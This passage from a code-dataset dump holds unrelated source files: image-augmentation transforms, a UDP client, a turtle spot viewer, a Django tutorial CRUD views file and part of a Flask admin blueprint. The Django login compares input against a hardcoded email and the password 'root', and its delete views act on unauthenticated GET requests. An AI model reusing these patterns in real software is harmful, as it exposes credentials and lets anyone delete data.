and mean of each channel of the numpy array i.e.\n channel = (channel - mean) / std\n \"\"\"\n\n def __init__(self, range_min=0.0, range_max=1.0):\n self.scale = (range_min, range_max)\n\n def __call__(self, image):\n mn = image.min(axis=(0, 1))\n md = np.median(image, axis=(0, 1))\n return self.scale[0] + (image - mn) * (self.scale[1] - self.scale[0]) / (md - mn)\n\n\nclass NormalizeNumpy(object):\n \"\"\"Normalize each channel of the numpy array i.e.\n channel = (channel - mean) / std\n \"\"\"\n\n def __call__(self, image):\n image -= image.mean(axis=(0, 1))\n s = image.std(axis=(0, 1))\n s[s == 0] = 1.0\n image /= s\n return image\n\n\nclass MutualExclude(object):\n \"\"\"Remove elements from one channel\n \"\"\"\n\n def __init__(self, exclude_channel, from_channel):\n self.from_channel = from_channel\n self.exclude_channel = exclude_channel\n\n def __call__(self, image):\n mask = image[:, :, self.exclude_channel] > 0\n image[:, :, self.from_channel][mask] = 0\n return image\n\n\nclass RandomCropNumpy(object):\n \"\"\"Crops the given numpy array at a random location to have a region of\n the given size. size can be a tuple (target_height, target_width)\n or an integer, in which case the target will be of a square shape (size, size)\n \"\"\"\n\n def __init__(self, size, random_state=np.random):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n self.random_state = random_state\n\n def __call__(self, img):\n w, h = img.shape[:2]\n th, tw = self.size\n if w == tw and h == th:\n return img\n\n x1 = self.random_state.randint(0, w - tw)\n y1 = self.random_state.randint(0, h - th)\n return img[x1:x1 + tw, y1: y1 + th, :]\n\n\nclass CenterCropNumpy(object):\n \"\"\"Crops the given numpy array at the center to have a region of\n the given size. 
size can be a tuple (target_height, target_width)\n or an integer, in which case the target will be of a square shape (size, size)\n \"\"\"\n\n def __init__(self, size):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, img):\n w, h = img.shape[:2]\n th, tw = self.size\n x1 = int(round((w - tw) / 2.))\n y1 = int(round((h - th) / 2.))\n return img[x1:x1 + tw, y1: y1 + th, :]\n\n\nclass RandomRotate(object):\n \"\"\"Rotate a PIL.Image or numpy.ndarray (H x W x C) randomly\n \"\"\"\n\n def __init__(self, angle_range=(0.0, 360.0), axes=(0, 1), mode='reflect', random_state=np.random):\n assert isinstance(angle_range, tuple)\n self.angle_range = angle_range\n self.random_state = random_state\n self.axes = axes\n self.mode = mode\n\n def __call__(self, image):\n angle = self.random_state.uniform(\n self.angle_range[0], self.angle_range[1])\n if isinstance(image, np.ndarray):\n mi, ma = image.min(), image.max()\n image = scipy.ndimage.interpolation.rotate(\n image, angle, reshape=False, axes=self.axes, mode=self.mode)\n return np.clip(image, mi, ma)\n elif isinstance(image, Image.Image):\n return image.rotate(angle)\n else:\n raise Exception('unsupported type')\n\n\nclass BilinearResize(object):\n \"\"\"Resize a PIL.Image or numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, zoom):\n self.zoom = [zoom, zoom, 1]\n\n def __call__(self, image):\n if isinstance(image, np.ndarray):\n return scipy.ndimage.interpolation.zoom(image, self.zoom)\n elif isinstance(image, Image.Image):\n return image.resize(self.size, Image.BILINEAR)\n else:\n raise Exception('unsupported type')\n\n\nclass EnhancedCompose(object):\n \"\"\"Composes several transforms together.\n Args:\n transforms (List[Transform]): list of transforms to compose.\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n if isinstance(t, collections.Sequence):\n assert isinstance(img, collections.Sequence) and len(img) == len(\n t), \"size of image group and transform group does not fit\"\n tmp_ = []\n for i, im_ in enumerate(img):\n if callable(t[i]):\n tmp_.append(t[i](im_))\n else:\n tmp_.append(im_)\n img = tmp_\n elif callable(t):\n img = t(img)\n elif t is None:\n continue\n else:\n raise Exception('unexpected type')\n return img\n\n\nclass PadToScale(object):\n def __init__(self, scale_size, fill=0, padding_mode='constant'):\n # assert isinstance(fill, (numbers.Number, str, tuple))\n # assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']\n\n self.fill = fill\n self.padding_mode = padding_mode\n self.scale_size = scale_size\n\n @staticmethod\n def get_padding(volume, scale_size):\n target_w = scale_size[0]\n target_h = scale_size[1]\n target_z = scale_size[2]\n\n h_padding = (target_w - volume.shape[0]) / 2\n v_padding = (target_h - volume.shape[1]) / 2\n z_padding = (target_z - volume.shape[2]) / 2\n\n l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5\n t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5\n r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5\n b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5\n z0_pad = z_padding if z_padding % 1 == 0 else z_padding + 0.5\n z1_pad = z_padding if z_padding % 1 == 0 else z_padding - 0.5\n\n padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad), int(z0_pad), 
int(z1_pad))\n\n return padding\n\n def __call__(self, img):\n \"\"\"\n Args:\n img (Torch Tensor): Image to be padded.\n\n Returns:\n Tensor: Padded image.\n \"\"\"\n return pad(img, PadToScale.get_padding(img, self.scale_size), self.fill, self.padding_mode)\n\n def __repr__(self):\n return self.__class__.__name__ + f'(fill={self.fill}, padding_mode={self.padding_mode}, scale_size={self.scale_size})'\n\n\nclass TorchIOTransformer(object):\n def __init__(self, get_transformer, max_output_channels=10, prudent=True, verbose=False):\n self.get_transformer = get_transformer\n self.max_output_channels = max_output_channels\n self.prudent = prudent\n self.verbose = verbose\n\n def __call__(self, *inputs):\n if isinstance(inputs, collections.Sequence) or isinstance(inputs, np.ndarray):\n outputs = []\n for idx, _input in enumerate(inputs):\n # todo also apply transformer to mask and then reapply mask to input/label\n _input = _input.permute(3, 0, 1, 2) # channels first for torchio\n # Detect masks (label mask and brain mask)\n n_unique = list(_input.unique().size())[0]\n if n_unique <= self.max_output_channels or n_unique <= 2:\n transformer = self.get_transformer(mask=True)\n input_tf = transformer(_input)\n input_tf = input_tf.round()\n if _input.unique().size() != input_tf.unique().size():\n if self.verbose:\n print(f'WARNING... Input mask and its transformation differ in number of classes: '\n f'input {_input.unique().size()} vs. transformed {input_tf.unique().size()} '\n f'for {transformer} and number of voxels in initial mask: {_input.sum()}')\n if self.prudent:\n if self.verbose: print('Returning non transformed input.')\n # Avoid loss of classes by transformation\n # (either due to extreme transformation or very little voxels of a certain class present)\n return inputs # return bot all inputs untransformed\n else:\n transformer = self.get_transformer()\n input_tf = transformer(_input)\n input_tf = input_tf.permute(1, 2, 3, 0) # replace channels last\n\n outputs.append(input_tf)\n return outputs if idx >= 1 else outputs[0]\n else:\n raise Exception(\"inputs is not a sequence (list, tuple, etc)\")\n\n\nclass RandomElasticTransform(TorchIOTransformer):\n def __init__(\n self,\n num_control_points: Union[int, Tuple[int, int, int]] = 7,\n max_displacement: Union[float, Tuple[float, float, float]] = 7.5,\n locked_borders: int = 2,\n image_interpolation: str = 'linear',\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels = 10,\n verbose = False,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n if mask:\n interpolation = 'linear'\n else:\n interpolation = image_interpolation\n return RandomElasticDeformation(num_control_points=num_control_points, max_displacement=max_displacement,\n locked_borders=locked_borders, image_interpolation=interpolation, p=p,\n seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, verbose=verbose, prudent=prudent)\n\n\nclass RandomAffineTransform(TorchIOTransformer):\n def __init__(\n self,\n scales: Tuple[float, float] = (0.9, 1.1),\n degrees = 10,\n translation = 0,\n center: str = 'image',\n isotropic: bool = False,\n default_pad_value: Union[str, float] = 'otsu',\n image_interpolation: str = 'linear',\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels=10,\n verbose = False,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n if mask:\n interpolation = 'linear'\n else:\n interpolation = image_interpolation\n return RandomAffine(scales=scales, 
degrees=degrees, translation=translation, isotropic=isotropic,\n center=center, default_pad_value=default_pad_value, image_interpolation=interpolation,\n p=p, seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, verbose=verbose, prudent=prudent)\n\n\nclass RandomFlipTransform(TorchIOTransformer):\n def __init__(\n self,\n axes: Union[int, Tuple[int, ...]] = 0,\n flip_probability: float = 0.5,\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels=10,\n verbose = False,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n return RandomFlip(axes=axes, flip_probability=flip_probability, p=p, seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, verbose=verbose, prudent=prudent)\n\n\nclass RandomNoiseTransform(TorchIOTransformer):\n def __init__(\n self,\n mean: Union[float, Tuple[float, float]] = 0,\n std: Tuple[float, float] = (0, 0.25),\n p: float = 1,\n seed: Optional[int] = None,\n max_output_channels=10,\n prudent=True\n ):\n def get_torchio_transformer(mask=False):\n if mask:\n # Don't apply noise on mask\n proba = 0\n else:\n proba = p\n return RandomNoise(mean=mean, std=std, p=proba, seed=seed)\n super().__init__(get_transformer=get_torchio_transformer, max_output_channels=max_output_channels, prudent=prudent)\n\n\nclass StandardizeImage(object):\n \"\"\"\n Normalises given volume to zero mean and unit standard deviation.\n :arg norm_flag: List[bool], define which axis should be normalised and which should not\n \"\"\"\n\n def __init__(self,\n norm_flag=[True, True, True, False]):\n \"\"\"\n :param norm_flag: [bool] list of flags for normalisation, defining which axis should be normalised\n \"\"\"\n self.norm_flag = norm_flag\n\n def __call__(self, *inputs):\n # prepare the normalisation flag\n if isinstance(self.norm_flag, bool):\n norm_flag = [self.norm_flag] * len(inputs[0].shape)\n else:\n norm_flag = self.norm_flag\n outputs = []\n for idx, _input in enumerate(inputs):\n # Normalize only the image, not the mask\n if idx == 0:\n assert (len(norm_flag) == len(_input.shape))\n dim_to_reduce = ()\n for i in range(len(_input.shape)):\n if norm_flag[i]:\n dim_to_reduce += (i,)\n if norm_flag[idx]:\n # subtract the mean intensity value\n mean_val = _input.mean(dim=dim_to_reduce)\n _input = _input.add(-1.0 * mean_val)\n\n # scale the intensity values to be unit norm\n std_val = _input.std(dim=dim_to_reduce)\n _input = _input.div(1.0 * std_val)\n\n outputs.append(_input)\n\n return outputs if idx >= 1 else outputs[0]\n","sub_path":"dataio/transformation/imageTransformations.py","file_name":"imageTransformations.py","file_ext":"py","file_size_in_byte":23151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"238716819","text":"from socket import *\n\nserverName = \"localhost\"\nserverPort = 12000\nclientSocket = socket(AF_INET, SOCK_DGRAM)\n\nmessage=input(\"Input your message: \")\nclientSocket.sendto(message.lower().encode(), (serverName, serverPort))\n\nmodifiedMessage, serverAddress = clientSocket.recvfrom(2048)\n\nprint(modifiedMessage.decode())\nclientSocket.close()\n","sub_path":"dat204g19h/assignment_2/UDPClient.py","file_name":"UDPClient.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"409257199","text":"#!/usr/bin/env python\n#\n# turtle_spotter.py\n#\n# Copyright (C) (2013) STFC Rutherford 
Appleton Laboratory, UK.\n#\n# Author: David Waterman.\n#\n# This code is distributed under the BSD license, a copy of which is\n# included in the root directory of this package.\n\nfrom __future__ import division\n\n\"\"\"A turtle diffraction spot viewer\"\"\"\n\nclass ScriptRunner(object):\n \"\"\"Class to run script.\"\"\"\n\n def __init__(self, reflections_filename):\n \"\"\"Setup the script.\"\"\"\n\n # Filename data\n self.reflections_filename = reflections_filename\n\n def __call__(self):\n \"\"\"Run the script.\"\"\"\n import cPickle as pickle\n from dials.model.data import ReflectionList # import dependency\n from dials.util.command_line import Command\n\n # Read the pickle file\n Command.start('Reading reflection file.')\n with open(self.reflections_filename, 'rb') as f:\n self.reflections = pickle.load(f)\n\n Command.end('Read {0} spots from reflection file.'.format(\n len(self.reflections)))\n\n self.view()\n\n def view(self):\n import turtle\n coords = [ref.image_coord_mm for ref in self.reflections]\n x, y = zip(*coords)\n min_x, max_x = min(x), max(x)\n min_y, max_y = min(y), max(y)\n low = min(min_x, min_y)\n high = max(max_x, max_y)\n turtle.title(\"Reflections from \" + self.reflections_filename)\n turtle.setworldcoordinates(low, low, high, high)\n turtle.pen(speed=0,pensize=2)\n turtle.hideturtle()\n for ref in self.reflections:\n (x, y) = ref.image_coord_mm\n turtle.penup()\n turtle.setx(x)\n turtle.sety(y)\n turtle.pendown()\n turtle.circle(1.0, steps=8)\n turtle.done()\n\n\n\nif __name__ == '__main__':\n\n from optparse import OptionParser\n\n # Specify the command line options\n usage = \"usage: %prog [options] \" \\\n \"/path/to/reflections.pickle \"\n\n # Create an option parser\n parser = OptionParser(usage)\n\n # Parse the arguments\n options, args = parser.parse_args()\n\n # Print help if no arguments specified, otherwise call function\n if len(args) < 1:\n parser.print_help()\n else:\n # Initialise the script runner\n runner = ScriptRunner(\n reflections_filename=args[0])\n\n # Run the script\n runner()\n","sub_path":"scratch/dgw/turtle_spotter.py","file_name":"turtle_spotter.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"103396944","text":"# _*_ coding:utf-8 _*_\n# 文件作者: ZHMing123\n# 开发时间:2020/4/14 10:40\n# 文件名称:views.py\n# 开发工具:PyCharm\n\nfrom django.shortcuts import HttpResponse, render, redirect\n\nfrom app01 import models\n\ndef zhming(request):\n # request参数保存了所有和浏览器请求相关是数据\n return HttpResponse('hello zhming!')\n\n\ndef hello(request):\n # request参数保存了所有和浏览器请求相关是数据\n # 手动找HTML文件\n # with open(\"templates/zhming.html\", \"r\", encoding=\"utf-8\") as f:\n # data = f.read()\n # return HttpResponse(data)\n\n # Django找html文件\n return render(request, \"zhming.html\")\n\n# 登录函数\ndef login(request):\n error_msg = \"\"\n # 如果是GET请求,返回html页面\n if request.method == \"POST\":\n # 如果是POST请求,取出提交的数据,做登录判断\n # print(request.POST) # 取到所有post的数据\n email = request.POST.get(\"email\", None) # 没有\"email\"返回None\n pwd = request.POST.get(\"pwd\", None)\n print(email, pwd)\n # 判断是否登录成功\n if email == \"1424116457@qq.com\" and pwd == \"root\":\n # 登录成功\n # return HttpResponse(\"登录成功!\")\n return redirect(\"https://zhming123.github.io/\")\n\n else:\n error_msg = \"邮箱或者密码错误!\"\n\n # GET请求或者登录失败后执行\n return render(request, \"login_demo.html\", {\"error\": error_msg})\n\ndef login_validate(request):\n # request参数保存了所有和浏览器请求相关是数据\n # 获取用户提交的数据\n print(request.POST) # 取到所有post的数据\n 
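    # Every handler in this file repeats the same method-branching shape: branch on
    # request.method, read fields from request.POST, redirect on success, and re-render
    # the form with an error message otherwise. A condensed sketch of that pattern
    # (field and template names are placeholders, not from this app):
    def demo_view(request):
        error_msg = ""
        if request.method == "POST":
            value = request.POST.get("field", None)    # None when the key is absent
            if value:
                return redirect("/somewhere/")         # redirect-after-POST avoids resubmission
            error_msg = "field must not be empty"
        # reached on GET requests and on failed POSTs
        return render(request, "demo.html", {"error": error_msg})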
email = request.POST.get(\"email\", None) # 没有\"email\"返回None\n pwd = request.POST.get(\"pwd\", None)\n print(email, pwd)\n # 判断是否登录成功\n if email == \"1424116457@qq.com\" and pwd == \"root\":\n return HttpResponse(\"登录成功!\")\n else:\n return HttpResponse(\"登录失败!\")\n\n# 查询函数(展示所有用户)\ndef user_list(request):\n # 去数据库中查询所有用户\n # 用ORM工具\n ret = models.Student.objects.all() # 返回一个对象列表[Student Object, Student Object)\n # print(ret)\n # print(ret[0].id, ret[0].name)\n return render(request, \"user_list.html\", {\"user_list\": ret})\n # return HttpResponse(\"ok!\")\n\n# 添加用户\ndef add_user(request):\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据\n new_name = request.POST.get(\"username\", None)\n if new_name:\n # 去数据库中创建一条新记录\n models.Student.objects.create(name=new_name)\n # return HttpResponse(\"添加成功!\")\n # 添加成功后直接跳转到用户列表页\n return redirect(\"/user_list/\") # 跳转路径\n else:\n error_msg = \"名字不能为空!\"\n\n return render(request, \"add_user.html\", {\"error\": error_msg})\n\n\n# 删除用户\ndef delete_user(request):\n print(request.GET)\n print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Student.objects.get(id=del_id)\n # 删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/user_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑用户\ndef edit_user(request):\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_id = request.POST.get(\"id\", None)\n new_name = request.POST.get(\"username\", None)\n # 更新\n # 根据id取到编辑的是哪用户\n edit_obj = models.Student.objects.get(id=edit_id)\n edit_obj.name = new_name\n edit_obj.save() # 把修改提交\n\n # 跳转\n return redirect(\"/user_list/\")\n\n\n # 从GET请求中获取到当前编辑的用户对象的id\n edit_id = request.GET.get(\"id\", None)\n if edit_id:\n # 查找到当前编辑的用户对象\n user_obj = models.Student.objects.get(id=edit_id)\n return render(request, \"edit_user.html\", {\"user\": user_obj})\n else:\n return HttpResponse(\"编辑的用户不存在!\")\n\n\n# 出版社视图\n\n# 查询函数(展示所有出版社)\ndef publisher_list(request):\n # 去数据库中查询所有出版社\n # 用ORM工具\n ret = models.Publisher.objects.all() # 返回一个对象列表[Publisher Object, Publisher Object)\n # print(ret)\n # print(ret[0].id, ret[0].name)\n return render(request, \"publisher_list.html\", {\"publisher_list\": ret})\n # return HttpResponse(\"ok!\")\n\n\n# 添加出版社\ndef add_publisher(request):\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据\n new_name = request.POST.get(\"publisher_name\", None)\n if new_name:\n # 去数据库中创建一条新记录\n models.Publisher.objects.create(name=new_name)\n # return HttpResponse(\"添加成功!\")\n # 添加成功后直接跳转到用户列表页\n return redirect(\"/publisher_list/\") # 跳转路径\n else:\n error_msg = \"名字不能为空!\"\n\n return render(request, \"add_publisher.html\", {\"error\": error_msg})\n\n\n# 删除出版社\ndef delete_publisher(request):\n print(request.GET)\n print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Publisher.objects.get(id=del_id)\n # 删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/publisher_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑出版社\ndef edit_publisher(request):\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_publisher_id = request.POST.get(\"id\", None)\n 
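    # The edit views in this file all run the same ORM read-modify-write cycle; condensed
    # (Publisher as in this app's models; pk and new_name are illustrative variables):
    #
    #   obj = models.Publisher.objects.get(id=pk)   # raises Publisher.DoesNotExist for a stale id
    #   obj.name = new_name
    #   obj.save()                                  # issues the UPDATE
    #
    # When the instance is not needed afterwards, the same change is a single query:
    #   models.Publisher.objects.filter(id=pk).update(name=new_name)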
new_publisher_name = request.POST.get(\"publisher_name\", None)\n # 更新\n # 根据id取到编辑的是哪用户\n edit_obj = models.Publisher.objects.get(id=edit_publisher_id)\n edit_obj.name = new_publisher_name\n edit_obj.save() # 把修改提交到数据库\n\n # 跳转\n return redirect(\"/publisher_list/\")\n\n\n # 从GET请求中获取到当前编辑的用户对象的id\n edit_publisher_id = request.GET.get(\"id\", None)\n if edit_publisher_id:\n # 查找到当前编辑的用户对象\n publisher_obj = models.Publisher.objects.get(id=edit_publisher_id)\n return render(request, \"edit_publisher.html\", {\"publisher\": publisher_obj})\n else:\n return HttpResponse(\"编辑的出版社不存在!\")\n\n\n# 书的视图\n\n# 查询函数(展示所有出版社)\ndef book_list(request):\n # ���数据库中查询所有出版社\n # 用ORM工具\n all_book = models.Book.objects.all() # 返回一个对象列表[Publisher Object, Publisher Object)\n # print(ret)\n # print(ret[0].id, ret[0].name)\n return render(request, \"book_list.html\", {\"all_book\": all_book})\n\n\n\n# 添加书籍\ndef add_book(request):\n # 取到所有出版社\n publisher_list = models.Publisher.objects.all()\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据 {\"book_title\": \"电子工业出版社\" , \"publisher_id\": id}\n new_book_title = request.POST.get(\"book_title\", None)\n new_publisher_id = request.POST.get(\"publisher\", None)\n if new_book_title:\n # 去数据库中创建一条新记录,自动提交\n models.Book.objects.create(title=new_book_title, publisher_id=new_publisher_id)\n # return HttpResponse(\"添加成功!\")\n # 添加成功后直接跳转到书籍列表页\n return redirect(\"/book_list/\") # 跳转路径\n else:\n error_msg = \"书名不能为空!\"\n\n return render(request, \"add_book.html\", {\"error\": error_msg, \"publisher_list\": publisher_list})\n\n\n# 删除书籍\ndef delete_book(request):\n # print(request.GET)\n # print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Book.objects.get(id=del_id)\n # 删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/book_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑书籍\ndef edit_book(request):\n # 取到所有出版社\n publisher_list = models.Publisher.objects.all()\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_id = request.POST.get(\"book_id\", None)\n print(edit_id)\n new_book_title = request.POST.get(\"book_title\", None)\n new_book_publisher_id = request.POST.get(\"publisher\", None)\n # 更新\n # 根据id取到编辑的是哪本书籍\n edit_book_obj = models.Book.objects.get(id=edit_id)\n edit_book_obj.title = new_book_title\n edit_book_obj.publisher_id = new_book_publisher_id # 当前书籍关联的出版社id值\n edit_book_obj.save() # 把修改提交到数据库\n\n # 跳转\n return redirect(\"/book_list/\")\n\n\n # 从GET请求中获取到当前编辑的用户对象的id\n edit_id = request.GET.get(\"id\", None)\n # print(edit_id)\n if edit_id:\n # 查找到当前编辑的用户对象\n edit_book_obj = models.Book.objects.get(id=edit_id)\n return render(request,\n \"edit_book.html\",\n {\"book\": edit_book_obj, \"publisher_list\": publisher_list}\n )\n else:\n return HttpResponse(\"编辑的书籍不存在!\")\n\n\n# 作者视图\n\n# 作者列表\ndef author_list(request):\n all_author = models.Author.objects.all().order_by(\"id\")\n # print(all_author[0].book.all()) # 当前所有作者的书籍\n return render(request, \"author_list.html\", {\"author_list\": all_author})\n\n\n# 增加作者\ndef add_author(request):\n # 获取所有是书籍\n all_book = models.Book.objects.all()\n # 第一次请求页面时,就返回一个页面,页面上有两个框让用户输入\n error_msg = \"\"\n if request.method == \"POST\":\n # 获取POST的数据\n new_author_name = request.POST.get(\"author_name\", None)\n # post提交的数据是多个值时,用getlist,如多选的select或者checkbox\n books = 
request.POST.getlist(\"books\", None)\n # print(new_author_name, books)\n if new_author_name:\n # 去数据库中创建一条新记录,自动提交\n # 创建作者\n new_author_obj = models.Author.objects.create(name=new_author_name)\n # 把新作者和书籍建立对应关系\n new_author_obj.book.set(books)\n # return HttpResponse(\"添加成功!\")\n\n # 添加成功后直接跳转到书籍列表页\n return redirect(\"/author_list/\") # 跳转路径\n else:\n error_msg = \"作者不能为空!\"\n\n return render(request, \"add_author.html\", {\"all_book\": all_book, \"error\": error_msg})\n\n\n# 删除作者\ndef delete_author(request):\n # print(request.GET)\n # print(\"=================================\")\n # 取到删除指定的数据(a标签是get请求)\n # 从get请求的参数中获取到要删除的数据的��者id值\n del_id = request.GET.get(\"id\", None)\n # print(del_id)\n # 如果能取到id值\n if del_id:\n # 去数据库删除当前id值的数据\n # 根据id值查找数据\n del_obj = models.Author.objects.get(id=del_id)\n # 删除\n # 1、去作者表把作者删除\n # 2、去作者和书籍的关联表,把对应关联记录删除\n del_obj.delete()\n # 返回删除后的页面\n return redirect(\"/author_list/\")\n else:\n return HttpResponse(\"要删除的数据不存在!\")\n\n\n# 编辑作者\ndef edit_author(request):\n # 取到所有书籍对象\n book_list = models.Book.objects.all()\n # 修改后POST的数据\n if request.method == \"POST\":\n # 获取新的名字\n edit_author_id = request.POST.get(\"author_id\", None)\n # print(edit_id)\n new_author_name = request.POST.get(\"author_name\", None)\n # 拿到编辑后作者关联的书籍\n new_books = request.POST.getlist(\"books\", None)\n # 更新\n # 根据id取到当前编辑的作者\n edit_author_obj = models.Author.objects.get(id=edit_author_id)\n edit_author_obj.name = new_author_name\n edit_author_obj.book.set(new_books) # 当前作者关联是书\n edit_author_obj.save() # 把修改提交到数据库\n\n # 跳转\n return redirect(\"/author_list/\")\n\n\n # 从GET请求中获取到当前编辑的作者对象的id\n edit_id = request.GET.get(\"id\", None)\n # print(edit_id)\n if edit_id:\n # 查找到当前编辑的用户对象\n edit_author_obj = models.Author.objects.get(id=edit_id)\n return render(request,\n \"edit_author.html\",\n {\"author\": edit_author_obj, \"book_list\": book_list}\n )\n else:\n return HttpResponse(\"编辑的作者不存在!\")","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"162251072","text":"import json\nfrom datetime import datetime, timedelta\n\nimport parse\nfrom dateutil.parser import parse as dateparse\nfrom flask import Blueprint\nfrom sqlalchemy.exc import DataError, IntegrityError\n\nfrom anubis.models import (\n db,\n Assignment,\n AssignmentRepo,\n User,\n AssignmentTest,\n SubmissionTestResult,\n)\nfrom anubis.utils.auth.http import require_admin\nfrom anubis.utils.data import rand\nfrom anubis.utils.data import row2dict, req_assert\nfrom anubis.utils.http.decorators import load_from_id, json_response, json_endpoint\nfrom anubis.utils.http import error_response, success_response\nfrom anubis.lms.assignments import assignment_sync\nfrom anubis.lms.courses import course_context, assert_course_context\nfrom anubis.lms.questions import get_assigned_questions\nfrom anubis.utils.logging import logger\n\nassignments = Blueprint(\"admin-assignments\", __name__, url_prefix=\"/admin/assignments\")\n\n\n@assignments.route('/repos/')\n@require_admin()\n@load_from_id(Assignment, verify_owner=False)\n@json_response\ndef admin_assignments_repos_id(assignment: Assignment):\n \"\"\"\n\n :param assignment:\n :return:\n \"\"\"\n\n assert_course_context(assignment)\n\n repos = AssignmentRepo.query.filter(\n AssignmentRepo.assignment_id == assignment.id,\n ).all()\n\n def get_ssh_url(url):\n r = parse.parse('https://github.com/{}', url)\n path = r[0]\n path = 
path.removesuffix('.git')\n return f'git@github.com:{path}.git'\n\n return success_response({'assignment': assignment.full_data, 'repos': [\n {\n 'id': repo.id,\n 'url': repo.repo_url,\n 'ssh': get_ssh_url(repo.repo_url),\n 'github_username': repo.github_username,\n 'name': repo.owner.name if repo.owner_id is not None else 'N/A',\n 'netid': repo.owner.netid if repo.owner_id is not None else 'N/A',\n }\n for repo in repos\n ]})\n\n\n@assignments.route(\"/assignment//questions/get/\")\n@require_admin()\n@load_from_id(Assignment, verify_owner=False)\n@json_response\ndef private_assignment_id_questions_get_netid(assignment: Assignment, netid: str):\n \"\"\"\n Get questions assigned to a given student.\n\n :param assignment:\n :param netid:\n :return:\n \"\"\"\n user = User.query.filter_by(netid=netid).first()\n\n # Verify that the user exists, and that the assignment\n # is within the course context of the current user.\n req_assert(user is not None, message='user not found')\n assert_course_context(assignment)\n\n return success_response(\n {\n \"netid\": user.netid,\n \"questions\": get_assigned_questions(assignment.id, user.id),\n }\n )\n\n\n@assignments.route(\"/get/\")\n@require_admin()\n@load_from_id(Assignment, verify_owner=False)\n@json_response\ndef admin_assignments_get_id(assignment: Assignment):\n \"\"\"\n Get the full data for an assignment id. The course context\n must be set, and will be checked.\n\n :param assignment:\n :return:\n \"\"\"\n\n # Confirm that the assignment they are asking for is part\n # of this course\n assert_course_context(assignment)\n\n # Pass back the full data\n return success_response({\n \"assignment\": row2dict(assignment),\n \"tests\": [test.data for test in assignment.tests],\n })\n\n\n@assignments.route(\"/list\")\n@require_admin()\n@json_response\ndef admin_assignments_list():\n \"\"\"\n List all assignments within the course context.\n\n * The response will be the row2dict of the assignment, not a data prop *\n\n :return:\n \"\"\"\n\n # Get all the assignment objects within the course context,\n # sorted by the due date.\n all_assignments = Assignment.query.filter(\n Assignment.course_id == course_context.id\n ).order_by(Assignment.due_date.desc()).all()\n\n # Pass back the row2dict of each assignment object\n return success_response({\n \"assignments\": [row2dict(assignment) for assignment in all_assignments]\n })\n\n\n@assignments.route('/tests/toggle-hide/')\n@require_admin()\n@json_response\ndef admin_assignment_tests_toggle_hide_assignment_test_id(assignment_test_id: str):\n \"\"\"\n Toggle an assignment test being hidden.\n\n :param assignment_test_id:\n :return:\n \"\"\"\n\n # Pull the assignment test\n assignment_test: AssignmentTest = AssignmentTest.query.filter(\n AssignmentTest.id == assignment_test_id,\n ).first()\n\n # Make sure the assignment test exists\n req_assert(assignment_test is not None, message='test not found')\n\n # Verify that course the assignment test is apart of and\n # the course context match\n assert_course_context(assignment_test)\n\n # Toggle the hidden field\n assignment_test.hidden = not assignment_test.hidden\n\n # Commit the change\n 